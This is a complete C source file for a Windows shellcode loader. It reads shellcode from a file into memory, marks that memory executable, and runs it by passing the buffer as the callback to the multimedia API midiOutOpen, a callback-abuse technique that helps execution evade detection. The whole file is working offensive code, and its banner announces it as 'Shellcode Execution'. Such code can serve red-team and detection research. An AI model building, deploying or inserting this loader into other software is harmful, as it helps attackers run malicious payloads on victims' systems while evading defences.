// Saumyajeet Das // Written/Compiled: Visual Studio 2022 // Usage: midiOutOpen.exe #pragma comment(lib, "winmm.lib") #include #include #include BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize); INT wmain(INT argc, WCHAR* argv[]) { BOOL Ret = FALSE; DWORD SCLen = 0; PCHAR Shellcode = NULL; HMIDIOUT hMidiDevice = NULL; PVOID hAlloc = NULL; DWORD oldProtect = 0; MMRESULT result = MMSYSERR_NOERROR; printf("========================================\n"); printf(" midiOutOpen Shellcode Execution\n"); printf("========================================\n"); if (argc != 2) { printf("[!] Usage: midiOutOpen.exe \n"); goto CLEANUP; } printf("[*] Reading shellcode from: %ws\n", argv[1]); Sleep(1000); Ret = ReadContents(argv[1], &Shellcode, &SCLen); if (!Ret) goto CLEANUP; printf("[*] Allocating memory for shellcode\n"); Sleep(1000); hAlloc = VirtualAlloc(NULL, SCLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); if (!hAlloc) goto CLEANUP; memcpy(hAlloc, Shellcode, SCLen); printf("[*] Setting memory permissions to executable\n"); Sleep(1000); Ret = VirtualProtect(hAlloc, SCLen, PAGE_EXECUTE_READ, &oldProtect); if (!Ret) goto CLEANUP; printf("[*] Executing Shellcode \n"); Sleep(1000); result = midiOutOpen(&hMidiDevice, MIDI_MAPPER, (DWORD_PTR)hAlloc, 0, CALLBACK_FUNCTION); if (result != MMSYSERR_NOERROR) goto CLEANUP; CLEANUP: if (hMidiDevice) midiOutClose(hMidiDevice); if (Shellcode) free(Shellcode); if (hAlloc) VirtualFree(hAlloc, 0, MEM_RELEASE); return 0; } BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize) { FILE* f = NULL; _wfopen_s(&f, Filepath, L"rb"); if (f) { fseek(f, 0, SEEK_END); *BufferSize = ftell(f); fseek(f, 0, SEEK_SET); *Buffer = (PCHAR)malloc(*BufferSize); if (*Buffer) { fread(*Buffer, *BufferSize, 1, f); } fclose(f); } return (*BufferSize != 0 && *Buffer != NULL) ? TRUE : FALSE; }